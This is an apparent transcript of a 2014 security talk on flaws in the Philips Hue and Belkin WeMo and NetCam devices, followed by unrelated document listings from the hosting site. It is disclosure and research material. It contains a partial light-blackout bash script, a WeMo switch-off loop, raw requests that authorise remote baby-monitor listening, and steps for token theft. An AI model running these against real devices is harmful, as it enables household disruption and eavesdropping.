Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND
|
|
|
- Myles Wilfrid Watson
- 10 years ago
- Views:
Transcription
1 2014 Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND
2 We are going to depend on IoT devices for our privacy and physical security at work and at home. Vulnerabilities can and will be exploited by mass malware. 50 billion IoT devices 1. We have a profound responsibility to enable them securely. Our discussion for laying a secure foundation must begin with an analysis of the security design of current generation IoT products. Source: Cisco 1 Building Blocks for Smart Networks:
3 We need to understand how currently popular IoT devices are implementing security controls and make amends so we lay a secure foundation into the future. In this discussion, we will analyze the security implementations of specific IoT products so we can have a discussion about tangible actions we must take to improve. We will focus on 4 products that are popular and self-installable: Philips Hue personal wireless lighting Belkin WeMo baby monitor Belkin WeMo switch Belkin NetCam
4 Philips Hue wireless lighting system
5 Wireless bridge and bulbs speak Zigbee Bridge connects to wired ethernet Maintains outbound connection with servers controlled by Philips Hue ios App Works on local Wi-Fi by communicating directly with the bridge Or remotely via external servers controlled by Philips
6 Upon launch, the ios app connects to the above URL to find out the internal IP address of the bridge. The bridge maintains an outbound connect to Philips and reports changes to it s internal address. Has Access-Control-Allow-Origin: * set so any website in the world can know that you have Hue installed, your bridge s serial number, bridge s MAC address, and internal IP address.
7 The user has 30 seconds to press the button on the bridge for verification.
8 In the background, the ios app sends the following POST to the bridge... POST /api HTTP/1.1 Host: Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Accept-Language: en-us Accept: */* Pragma: no-cache Connection: keep-alive User-Agent: hue/1.1.1 CFNetwork/ Darwin/ Content-Length: 71! {"username":"[username deleted]","devicetype":"iphone 5"}! The security issue here is that the username picked by the ios app is the MD5 of it s own MAC address.
9 The bridge responds when the button is pressed and the username is whitelisted... HTTP/ OK Cache-Control: no-store, no-cache, must-revalidate, postcheck=0, pre-check=0 Pragma: no-cache Expires: Mon, 1 Aug :00:00 GMT Connection: close Access-Control-Max-Age: 0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Content-Type Content-type: application/json! [{"success":{"username":"[username deleted]"}}] If an external website knows your whitelist token (explained later), they can do drive-by blackouts given the access-control policy on the bridge.
10 Perpetual blackout -> hue_blackout.bash # Get the internal IP of the bridge which is advertised on the meethue portal.! while [ -z "$bridge_ip" ]; do bridge_ip=($(curl --connect-timeout 5 -s awk '{match($0,/[0-9]+\.[0-9]+ \.[0-9]+\.[0-9]+/); ip = substr($0,rstart,rlength); print ip}')) # If no bridge is found, try again in 10 minutes. if [ -z "$bridge_ip" ]; then sleep 600 fi done
11 hue_blackout.bash # Get MAC addresses from the ARP table.! mac_addresses=( $(arp -a awk '{print toupper($4)}') ) # Cycle through the list for m in "${mac_addresses[@]}" do... # Compute MD5 hash of the MAC address bridge_username=( $(md5 -q -s $padded_m))... turn_it_off=($(curl --connect-timeout 5 -s -X PUT action -d {\"on\":false} grep success))...!
12 hue_blackout.bash if [ -n "$turn_it_off" ]; then echo "SUCCESS! It's blackout time!"; while true; do! turn_it_off=($(curl --connect-timeout 5 -s -X PUT action -d {\"on\":false} grep success))! # The Hue bridge can't keep up with too many #iterative requests. Sleep for 1/2 a sec to # let it recover sleep
13 Video Demonstration
14 Web portal can be used to turn off lights remotely Password requirement: 6 characters 1 minute lockout for 2 failed attempts Mass password leaks (people reuse passwords) can be an issue.
15 Hue supports IFTTT (If This Then That)
16 Fun IFTTT recipe? Tag them in a completely black photo ;-)
17 Recap Philips fixed the MD5/MAC issue in version Other vendors should learn from this issue Cannot rely on all devices on the internal network to be secure Next generation malware will scan for IoT devices like these giving the botnet herders the power to switch off infrastructure devices such as lightbulbs We need to do better than static passwords for devices like these that can have physical impact (password leaks or compromise of Philips infrastructure can lead to major issues) Platform partners such as IFTTT hold authorization tokens to remotely control millions of IoT devices. A mass password leak or compromise of IFTTT infrastructure can have major implications
18 Baby monitor connects to local Wi-Fi Connects to external SIP proxy to communicate with ios app Connects to monitor using local Wi-Fi to obtain authorization Connects to external SIP proxy to communicate with monitor
19 Lon J. Sediman s review of the WeMo baby monitor...but that's not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any ios device on your network to connect to it and listen in without a password. If that's not bad enough, when an iphone has connected once on the local network it can later tune into the monitor from anywhere in the world. Belkin assumes that your access point is secured and that the only people accessing it are people you know. This is especially troublesome for people who don't secure their access points or are using weak security that's vulnerable to cracking.! Belkin seems to acknowledge this vulnerability in the software, showing which devices can connect to the WeMo and whether or not to allow global snooping. Unfortunately WeMo gives full access to every device right out of the gate, requiring you to continually monitor it to ensure that an unauthorized listener hasn't connected to it.! The bottom line? It's not reliable enough to make it an effective monitor for my child, nor is it secure enough to give me the confidence that others can't snoop in. For those reasons I simply can't recommend this product.
20 Video demonstration of the issue
21 The ios app sends the following POST to the monitor... POST /upnp/control/remoteaccess1 HTTP/1.1 Content-Type: text/xml; charset="utf-8" SOAPACTION: "urn:belkin:service:remoteaccess:1#remoteaccess" Content-Length: 589 HOST: :49153 User-Agent: CyberGarage-HTTP/1.0! <?xml version="1.0" encoding="utf-8"?> <s:envelope xmlns:s=" s:encodingstyle=" <s:body> <u:remoteaccess xmlns:u="urn:belkin:service:remoteaccess:1"> <DeviceId>[removed]</DeviceId> <dst>0</dst> <HomeId></HomeId> <DeviceName>iPad 4G</DeviceName> The security issue here is that that any device on the network can send this request. Once the monitor approves, the device can listen in remotely. If browsers didn t implement cross-domain controls, this would v been CSRFable.
22 And the monitor responds... HTTP/ OK CONTENT-LENGTH: 631 CONTENT-TYPE: text/xml; charset="utf-8" DATE: Tue, 24 Sep :50:37 GMT EXT: SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/ X-User-Agent: redsonic! <s:envelope xmlns:s=" s:encodingstyle=" encoding/"><s:body> <u:remoteaccessresponse xmlns:u="urn:belkin:service:remoteaccess: 1"> <homeid>[deleted]</homeid> <pluginprivatekey>[deleted}</pluginprivatekey> <smartprivatekey>[deleted]/smartprivatekey> <resultcode>plgn_200</resultcode> <description>successful</description> <statuscode>s</statuscode> <smartuniqueid>[deleted]</smartuniqueid>......
23 When the user clicks on Listen a SIP call is initiated via :6060 SIP/ Trying Via: SIP/2.0/TCP :59662;rport=4096;received= ;branch=[DELETED Record-Route: <sip:k2.k.belkin.evodevices.com: 6060;transport=tcp;lr;did=f9e.f801;nat=yes> Call-ID: [DELETED] From: <sip:[deleted but same as smartuniqueid and DeviceID]@bedev.evomonitors.com>;tag=[removed] To: <sip:[deleted but same as serialnumber]@bedev.evomonitors.com> CSeq: 5874 INVITE Content-Length: 0 smartuniqueid and serialnumber are basically the authentication tokens.
24 Recap Anyone with temporary access to the Wi-Fi can listen in remotely. The argument about eavesdropping on traditional radio monitors doesn t fly. In this case the subsequent eavesdropping can happen from anywhere in the world. Next generation malware will scan for IoT devices like these to register automatically and ferry the authorized token to the attacker: 1. Obtain serialnumber from /setup.xml on monitor. 2. Issue POST request to /upnp/control/remoteaccess1 to authorize DeviceID. 3. Send both to the attacker. If we are going to have multiple devices in our homes in the future, we cannot hide behind the perimeter and rely on all devices on the internal network to be secure
25 Switch connects to local Wi-Fi Connects outbound to receive remote commands Connects to switch using local Wi-Fi to obtain authorization Controls switch directly (Wi-Fi) or remotely
26 remoteaccess1 is invoked similarly to the example listed for WeMo baby. An additional request is sent to apis/http/plugin/push/register with the authorization token (similar to DeviceID).
27 If browsers didn t implement cross-domain controls, this would ve been CSRFable. The ios app sends the following POST to switch to turn it off... POST /upnp/control/basicevent1 HTTP/1.1 SOAPACTION: "urn:belkin:service:basicevent:1#setbinarystate" Content-Length: 316 Content-Type: text/xml; charset="utf-8" HOST: :49153 User-Agent: CyberGarage-HTTP/1.0! <?xml version="1.0" encoding="utf-8"?> <s:envelope xmlns:s=" s:encodingstyle=" <s:body> <u:setbinarystate xmlns:u="urn:belkin:service:basicevent:1"> <BinaryState>0</BinaryState> </u:setbinarystate> </s:body> </s:envelope> The security issue here is that that any device on the network can send this request. There is no token required.
28 Issac Kelly s framework + #!/usr/bin/python! import time! from wemo import on,off,get! while True: off() time.sleep(5)
29 Video demonstration of the issue
30 Recap Any device on the Wi-Fi network can command the switch to turn off Next generation malware will scan for IoT devices like these to register automatically and ferry the authorized token to the attacker: 1. Obtain serialnumber from /setup.xml on switch. 2. Issue POST request to /upnp/control/remoteaccess1 to authorize DeviceID. 3. Send both to the attacker who can turn off the switch via a POST to If we are going to have multiple devices in our homes in the future, we cannot hide behind the perimeter and rely on all devices on the internal network to be secure
31 NetCam connects to local Wi-Fi Connects to external portal to view video and requires authentication every time
32 Traffic is secured using SSL except sometimes it s not and your credentials are sent to a remote server in clear
33 Recap Anyone along your ISP path to and your local Wi-Fi can capture your credentials and spy on you. What a waste of all that SSL in the design. Next generation malware will scan for IoT devices like these to capture credentials if vulnerabilities such as these are known. If we are going to have multiple devices in our homes in the future, we must design them securely. A simple slip up such as this can expose privacy.
Playing with Web Application Firewalls
Playing with Web Application Firewalls Who is Wendel? Independent penetration test analyst. Affiliated to Hackaholic team. Over 7 years in the security industry. Discovered vulnerabilities in Webmails,
Table of Contents. Open-Xchange Authentication & Session Handling. 1.Introduction...3
Open-Xchange Authentication & Session Handling Table of Contents 1.Introduction...3 2.System overview/implementation...4 2.1.Overview... 4 2.1.1.Access to IMAP back end services...4 2.1.2.Basic Implementation
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Security for mobile apps
November 2014 Security for mobile apps This white paper provides education on security considerations and requirements for mobile apps. 1 Contents Authentication & security for mobile apps 3 Securing mobile
Title page. Alcatel-Lucent 5620 SERVICE AWARE MANAGER 13.0 R7
Title page Alcatel-Lucent 5620 SERVICE AWARE MANAGER 13.0 R7 APPLICATION API DEVELOPER GUIDE 3HE-10590-AAAA-TQZZA Issue 1 December 2015 Legal notice Legal notice Alcatel, Lucent, Alcatel-Lucent and the
Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers
Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton Over the past year, one focus of the Foofus.NET
Demystifying cache. Kristian Lyngstøl Product Specialist Varnish Software AS
Demystifying cache Kristian Lyngstøl Product Specialist Varnish Software AS Montreal, March 2013 Agenda - The types of caches involved - The benefits of a cache - HTTP - Reverse proxy specifics Not: L1/L2
Web Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
Cyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
Vodia PBX RESTful API (v2.0)
Vodia PBX RESTful API (v2.0) 2015 Vodia Networks Inc. All rights reserved. Page 1 of 30 Contents Login... 3 Get license info... 4 Get a complete list of domains... 5 Get the details of a specific domain...
TCP/IP Networking An Example
TCP/IP Networking An Example Introductory material. This module illustrates the interactions of the protocols of the TCP/IP protocol suite with the help of an example. The example intents to motivate the
Crowbar: New generation web application brute force attack tool
Crowbar: New generation web application brute force attack tool 1 Tables of contents Introduction... 3 Challenges with brute force attacks... 3 Crowbar a fresh approach... 3 Other applications of crowbar...
Eyes on IZON: Surveilling IP Camera Security
Eyes on IZON: Surveilling IP Camera Security SESSION ID: HTA-F03A Mark Stanislav Security Evangelist Duo Security @markstanislav What is an IZON? IP enabled web camera that is fully managed from your ios-based
HTTP Protocol. Bartosz Walter <[email protected]>
HTTP Protocol Bartosz Walter Agenda Basics Methods Headers Response Codes Cookies Authentication Advanced Features of HTTP 1.1 Internationalization HTTP Basics defined in
CloudOYE CDN USER MANUAL
CloudOYE CDN USER MANUAL Password - Based Access Logon to http://mycloud.cloudoye.com. Enter your Username & Password In case, you have forgotten your password, click Forgot your password to request a
Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0
Security Guide BlackBerry Enterprise Service 12 for ios, Android, and Windows Phone Version 12.0 Published: 2015-02-06 SWD-20150206130210406 Contents About this guide... 6 What is BES12?... 7 Key features
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
Securing your Linksys WRT54G
Securing your Linksys WRT54G Abstract Current implementations of the 802.11b and 802.11g wireless LAN standards have several potential pitfalls for security. However, built in security mechanisms in these
Security and privacy in public WLAN networks
Security and privacy in public WLAN networks Savio Lau [email protected] March 01, 2005 Roadmap Introduction of public WLAN networks Network security User privacy Experiments and analysis Conclusion March
Scenario: IPsec Remote-Access VPN Configuration
CHAPTER 3 Scenario: IPsec Remote-Access VPN Configuration This chapter describes how to use the security appliance to accept remote-access IPsec VPN connections. A remote-access VPN enables you to create
Protocolo HTTP. Web and HTTP. HTTP overview. HTTP overview
Web and HTTP Protocolo HTTP Web page consists of objects Object can be HTML file, JPEG image, Java applet, audio file, Web page consists of base HTML-file which includes several referenced objects Each
BYOD Guidance: BlackBerry Secure Work Space
GOV.UK Guidance BYOD Guidance: BlackBerry Secure Work Space Published 17 February 2015 Contents 1. About this guidance 2. Summary of key risks 3. Secure Work Space components 4. Technical assessment 5.
Chapter 5 Configuring the Remote Access Web Portal
Chapter 5 Configuring the Remote Access Web Portal This chapter explains how to create multiple Web portals for different users and how to customize the appearance of a portal. It describes: Portal Layouts
How To Use Kiteworks On A Microsoft Webmail Account On A Pc Or Macbook Or Ipad (For A Webmail Password) On A Webcomposer (For An Ipad) On An Ipa Or Ipa (For
GETTING STARTED WITH KITEWORKS DEVELOPER GUIDE Version 1.0 Version 1.0 Copyright 2014 Accellion, Inc. All rights reserved. These products, documents, and materials are protected by copyright law and distributed
PlayReady App Creation Tutorial
Version 0.93 Samsung Smart TV 1 1. OVERVIEW... 4 2. INTRODUCTION... 4 2.1. DEVELOPMENT ENVIRONMENT... 4 2.2. FILES NEEDED FOR A PLAYREADY VIDEO APPLICATION... 5 3. SAMSUNG TV PLAYREADY SPECIFICATION...
Device Token Protocol for Persistent Authentication Shared Across Applications
Device Token Protocol for Persistent Authentication Shared Across Applications John Trammel, Ümit Yalçınalp, Andrei Kalfas, James Boag, Dan Brotsky Adobe Systems Incorporated, 345 Park Avenue, San Jose,
What is Bitdefender BOX?
Quick Setup Guide What is Bitdefender BOX? Think about Bitdefender BOX like an antivirus for your network. It s a hardware device that sits next to your Wi-Fi router and protects all Internet connected
An outline of the security threats that face SIP based VoIP and other real-time applications
A Taxonomy of VoIP Security Threats An outline of the security threats that face SIP based VoIP and other real-time applications Peter Cox CTO Borderware Technologies Inc VoIP Security Threats VoIP Applications
Access Your Cisco Smart Storage Remotely Via WebDAV
Application Note Access Your Cisco Smart Storage Remotely Via WebDAV WebDAV (Web-based Distributed Authoring and Versioning), is a set of extensions to the HTTP(S) protocol that allows a web server to
HTTP Reverse Proxy Scenarios
Sterling Secure Proxy HTTP Reverse Proxy Scenarios Version 3.4 Sterling Secure Proxy HTTP Reverse Proxy Scenarios Version 3.4 Note Before using this information and the product it supports, read the information
MatrixSSL Getting Started
MatrixSSL Getting Started TABLE OF CONTENTS 1 OVERVIEW... 3 1.1 Who is this Document For?... 3 2 COMPILING AND TESTING MATRIXSSL... 4 2.1 POSIX Platforms using Makefiles... 4 2.1.1 Preparation... 4 2.1.2
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
9 Simple steps to secure your Wi-Fi Network.
9 Simple steps to secure your Wi-Fi Network. Step 1: Change the Default Password of Modem / Router After opening modem page click on management - access control password. Select username, confirm old password
Quick Installation Guide
Quick Installation Guide (For Windows & Mac OS) Outdoor Wireless IP Camera Package Contents V1.1 IP Camera Power Adapter Resource CD Ethernet Cable Mounting Bracket(except FI8919) Wi-Fi Antenna Quick Installation
Xerox Mobile Print Cloud
September 2012 702P00860 Xerox Mobile Print Cloud Information Assurance Disclosure 2012 Xerox Corporation. All rights reserved. Xerox and Xerox and Design are trademarks of Xerox Corporation in the United
CARRIOTS TECHNICAL PRESENTATION
CARRIOTS TECHNICAL PRESENTATION Alvaro Everlet, CTO [email protected] @aeverlet Oct 2013 CARRIOTS TECHNICAL PRESENTATION 1. WHAT IS CARRIOTS 2. BUILDING AN IOT PROJECT 3. DEVICES 4. PLATFORM
HTTP. Internet Engineering. Fall 2015. Bahador Bakhshi CE & IT Department, Amirkabir University of Technology
HTTP Internet Engineering Fall 2015 Bahador Bakhshi CE & IT Department, Amirkabir University of Technology Questions Q1) How do web server and client browser talk to each other? Q1.1) What is the common
Web Application Security
Web Application Security The OWASP Foundation Securing the application Input validation Authorization Session mgmt Config mgmt Authenticatio n Error handling Web server App server DB server Secure storage
ICSA Labs Web Application Firewall Certification Testing Report Web Application Firewall - Version 2.1 (Corrected) Radware Inc. AppWall V5.6.4.
ICSA Labs Web Application Firewall Certification Testing Report Radware Inc. V5.6.4.1 May 30, 2013 Prepared by ICSA Labs 1000 Bent Creek Blvd., Suite 200 Mechanicsburg, PA 17050 www.icsalabs.com WAFX RADWAREINC-2013-0530-01
Home Network Administration Protocol (HNAP) Whitepaper
Home Network Administration Protocol (HNAP) Whitepaper Revised January 2009 Abstract This whitepaper provides information about the Home Network Administration Protocol (HNAP), which enables network equipment
Fairsail REST API: Guide for Developers
Fairsail REST API: Guide for Developers Version 1.02 FS-API-REST-PG-201509--R001.02 Fairsail 2015. All rights reserved. This document contains information proprietary to Fairsail and may not be reproduced,
2015-11-30. Web Based Single Sign-On and Access Control
0--0 Web Based Single Sign-On and Access Control Different username and password for each website Typically, passwords will be reused will be weak will be written down Many websites to attack when looking
Basic Xten Pro Configuration
Basic Xten Pro Configuration 1. Download and install Xten Lite. 2. Launch the Xten Lite client; click the Menu option just above the number 3 digit on the Xten keypad. 3. Double click on the System Settings
Securing SharePoint Server with Windows Azure Multi- Factor Authentication
Journal of Mobile, Embedded and Distributed Systems, vol. VII, no. 1, 2015 ISSN 2067 4074 Securing SharePoint Server with Windows Azure Multi- Factor Authentication Petru-Radu NARITA Department of Economic
Web Security School Final Exam
Web Security School Final Exam By Michael Cobb 1.) Which of the following services is not required to run a Windows server solely configured to run IIS and publish a Web site on the Internet? a. IIS Admin
Online Backup by Mozy. Common Questions
Online Backup by Mozy Common Questions Document Revision Date: June 29, 2012 Online Backup by Mozy Common Questions 1 What is Online Backup by Mozy? Online Backup by Mozy is a secure online data backup
Architecture and Data Flow Overview. BlackBerry Enterprise Service 10 721-08877-123 Version: 10.2. Quick Reference
Architecture and Data Flow Overview BlackBerry Enterprise Service 10 721-08877-123 Version: Quick Reference Published: 2013-11-28 SWD-20131128130321045 Contents Key components of BlackBerry Enterprise
Hypertext for Hyper Techs
Hypertext for Hyper Techs An Introduction to HTTP for SecPros Bio Josh Little, GSEC ~14 years in IT. Support, Server/Storage Admin, Webmaster, Web App Dev, Networking, VoIP, Projects, Security. Currently
THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6
The Proxy Server THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6 2 1 Purpose The proxy server acts as an intermediate server that relays requests between
Playing with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
Linksys E2500 Wireless-N Router Configuration Guide
Linksys E2500 Wireless-N Router Configuration Guide Revision 1.0 Copyright 2012 Maretron, LLP All Rights Reserved Maretron, LLP 9014 N. 23 rd Ave #10 Phoenix, AZ 85021-7850 http://www.maretron.com Maretron
Secure Web Browsing in Public using Amazon
Technical White Paper jwgoerlich.us Secure Web Browsing in Public using Amazon J Wolfgang Goerlich Written July 2011 Updated August 2012 with instructions for Mac users by Scott Wrosch. Abstract The weary
Configuring Health Monitoring
CHAPTER4 Note The information in this chapter applies to both the ACE module and the ACE appliance unless otherwise noted. The features that are described in this chapter apply to both IPv6 and IPv4 unless
CONTRACT MODEL IPONZ DESIGN SERVICE VERSION 2. Author: Foster Moore Date: 20 September 2011 Document Version: 1.7
CONTRACT MODEL IPONZ DESIGN SERVICE VERSION 2 Author: Foster Moore Date: 20 September 2011 Document Version: 1.7 Level 6, Durham House, 22 Durham Street West PO Box 106857, Auckland City Post Shop, Auckland
Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are.
Two Factor Authentication Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are. For example, one method currently utilized within
Targeted attacks: Tools and techniques
Targeted attacks: Tools and techniques Performing «red-team» penetration tests Lessons learned Presented on 17/03/2014 For JSSI OSSIR 2014 By Renaud Feil Agenda Objective: Present tools techniques that
Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet
Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet Prepared by: Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com
Network Security 1 Module 4 Trust and Identity Technology
Network Security 1 Module 4 Trust and Identity Technology 1 Learning Objectives 4.1 AAA 4.2 Authentication Technologies 4.3 Identity Based Networking Services (IBNS) 4.4 Network Admission Control (NAC)
Chapter 6 Virtual Private Networking Using SSL Connections
Chapter 6 Virtual Private Networking Using SSL Connections The FVS336G ProSafe Dual WAN Gigabit Firewall with SSL & IPsec VPN provides a hardwarebased SSL VPN solution designed specifically to provide
Administering Jive Mobile Apps
Administering Jive Mobile Apps Contents 2 Contents Administering Jive Mobile Apps...3 Configuring Jive for Android and ios... 3 Native Apps and Push Notifications...4 Custom App Wrapping for ios... 5 Native
CRESTRON-APP-ANDROID Control App for Android
1 Introduction The app from Crestron provides a Smart Graphics touch screen user interface on Android devices. Fully integrated with Crestron programming software including Crestron Studio, VT Pro-e, and
RFG Secure FTP. Web Interface
RFG Secure FTP Web Interface Step 1: Getting to the Secure FTP Web Interface: Open your preferred web browser and type the following address: http://ftp.raddon.com After you hit enter, you will be taken
Mobile Device Management Version 8. Last updated: 17-10-14
Mobile Device Management Version 8 Last updated: 17-10-14 Copyright 2013, 2X Ltd. http://www.2x.com E mail: [email protected] Information in this document is subject to change without notice. Companies names
Qsync Install Qsync utility Login the NAS The address is 192.168.1.210:8080 bfsteelinc.info:8080
Qsync Qsync is a cloud based file synchronization service empowered by QNAP Turbo NAS. Simply add files to your local Qsync folder, and they will be available on your Turbo NAS and all its connected devices.
AIRTEL INDIA OPEN API. Application Developer Guide for OAuth2 Authentication and Authorization. Document Version 1.1
AIRTEL INDIA OPEN API Application Developer Guide for OAuth2 Authentication and Authorization Document Version 1.1 This Application Developer Guide has been prepared for Airtel India. Copyright Intel Corporation
UPnP Internet of Things Dec 2014
UPnP Internet of Things Dec 2014 Keith Miller Intel Wouter van der Beek Cisco UPnP Internet of Things Task Force 2014 UPnP Forum Overview Scope Architecture Local components description Sensor Management
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Copyright 2013, 3CX Ltd. http://www.3cx.com E-mail: [email protected]
Manual Copyright 2013, 3CX Ltd. http://www.3cx.com E-mail: [email protected] Information in this document is subject to change without notice. Companies names and data used in examples herein are fictitious
The Hyper-Text Transfer Protocol (HTTP)
The Hyper-Text Transfer Protocol (HTTP) Antonio Carzaniga Faculty of Informatics University of Lugano October 4, 2011 2005 2007 Antonio Carzaniga 1 HTTP message formats Outline HTTP methods Status codes
Security Research Advisory
Security Research Advisory efront 3.6.15 Multiple Vulnerabilities [email protected] (+39) 02 9177 3041 Italia PoliHub Via Giovanni Durando, 39 20158 Milano United Kingdom New Bridge Street House 30-34,
INTEGRATION GUIDE. DIGIPASS Authentication for Citrix NetScaler (with AGEE)
INTEGRATION GUIDE DIGIPASS Authentication for Citrix NetScaler (with AGEE) Disclaimer Disclaimer of Warranties and Limitation of Liabilities All information contained in this document is provided 'as is';
Server Security. Contents. Is Rumpus Secure? 2. Use Care When Creating User Accounts 2. Managing Passwords 3. Watch Out For Aliases 4
Contents Is Rumpus Secure? 2 Use Care When Creating User Accounts 2 Managing Passwords 3 Watch Out For Aliases 4 Deploy A Firewall 5 Minimize Running Applications And Processes 5 Manage Physical Access
QuickStart Guide for Mobile Device Management
QuickStart Guide for Mobile Device Management Version 8.5 Inventory Configuration Security Management Distribution JAMF Software, LLC 2012 JAMF Software, LLC. All rights reserved. JAMF Software has made
HIGH PERFORMANCE WIRELESS ADAPTER
Product User Guide 4x4 MIMO Wi-Fi 802.11n 5G High performance wireless adapter HIGH PERFORMANCE WIRELESS ADAPTER 1 Table of Content 1. PRODUCT OVERVIEW... 6 1.1 Introduction... 6 1.2 Application... 6 1.3
Getting Started with the iscan Online Data Breach Risk Intelligence Platform
Getting Started with the iscan Online Data Breach Risk Intelligence Platform 2 Table of Contents Overview... 3 Data Breach Risk Intelligence... 3 Data Breach Prevention Lifecycle Defined... 3 Choosing
APACHE WEB SERVER. Andri Mirzal, PhD N28-439-03
APACHE WEB SERVER Andri Mirzal, PhD N28-439-03 Introduction The Apache is an open source web server software program notable for playing a key role in the initial growth of the World Wide Web Typically
Grandstream Networks, Inc. GXP2130/2140/2160 Auto-configuration Plug and Play
Grandstream Networks, Inc. GXP2130/2140/2160 Auto-configuration Plug and Play Introduction: This is a technical guide targeted to PBX developers that want to learn the different mechanisms that GXP2130/2140/2160
RemotelyAnywhere. Security Considerations
RemotelyAnywhere Security Considerations Table of Contents Introduction... 3 Microsoft Windows... 3 Default Configuration... 3 Unused Services... 3 Incoming Connections... 4 Default Port Numbers... 4 IP
E-Mail: [email protected] Phone: 281-283-2828 Fax: 281-283-2969 Box: 230 http://www.uhcl.edu/uct
A VPN (Virtual Private Network) provides a secure, encrypted tunnel from your computer to UHCL's network when off campus. UHCL offers VPN software to allow authenticated, secure access to many UHCL resources
Release Notes. SonicOS 6.1.2.0 is the initial release for the Dell SonicWALL NSA 2600 network security appliance.
SonicOS SonicOS Contents Release Purpose... 1 Platform Compatibility... 1 Upgrading Information... 1 Browser Support... 1 Feature Information... 2 Known Issues... 2 Resolved Issues... 4 Release Purpose
Installation and Setup Guide
Installation and Setup Guide Contents 1. Introduction... 1 2. Before You Install... 3 3. Server Installation... 6 4. Configuring Print Audit Secure... 11 5. Licensing... 16 6. Printer Manager... 17 7.
BCR Export Protocol SHAPE 2012
BCR Export Protocol SHAPE 2012 Business Card Reader sends HTTP POST multipart request optional HTTP authentication is supported, BASIC and DIGEST methods with the following parameters: command - Action
reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002)
1 cse879-03 2010-03-29 17:23 Kyung-Goo Doh Chapter 3. Web Application Technologies reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002) 1. The HTTP Protocol. HTTP = HyperText
Salesforce Integration
Salesforce Integration 2015 Bomgar Corporation. All rights reserved worldwide. BOMGAR and the BOMGAR logo are trademarks of Bomgar Corporation; other trademarks shown are the property of their respective
How to add a SIP server How to register a handset
How to add a SIP server How to register a handset Contents Contents... 1 Hardware required equipment... 2 Software required equipment... 3 Add server... 3 Register handset to base... 7 1 of 12 Hardware
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS Published by Tony Porterfield Feb 1, 2015. Overview The intent of this test plan is to evaluate a baseline set of data security practices
Chapter 27 Hypertext Transfer Protocol
Chapter 27 Hypertext Transfer Protocol Columbus, OH 43210 [email protected] http://www.cis.ohio-state.edu/~jain/ 27-1 Overview Hypertext language and protocol HTTP messages Browser architecture CGI
Using SAML for Single Sign-On in the SOA Software Platform
Using SAML for Single Sign-On in the SOA Software Platform SOA Software Community Manager: Using SAML on the Platform 1 Policy Manager / Community Manager Using SAML for Single Sign-On in the SOA Software
The Internet of Unpatched Things
The Internet of Unpatched Things Sarthak Grover and Nick Feamster Princeton University PrivacyCon 16 Current State of Consumer Smart Devices Many different manufacturers, small startups, novice programmers
QuickStart Guide for Mobile Device Management. Version 8.6
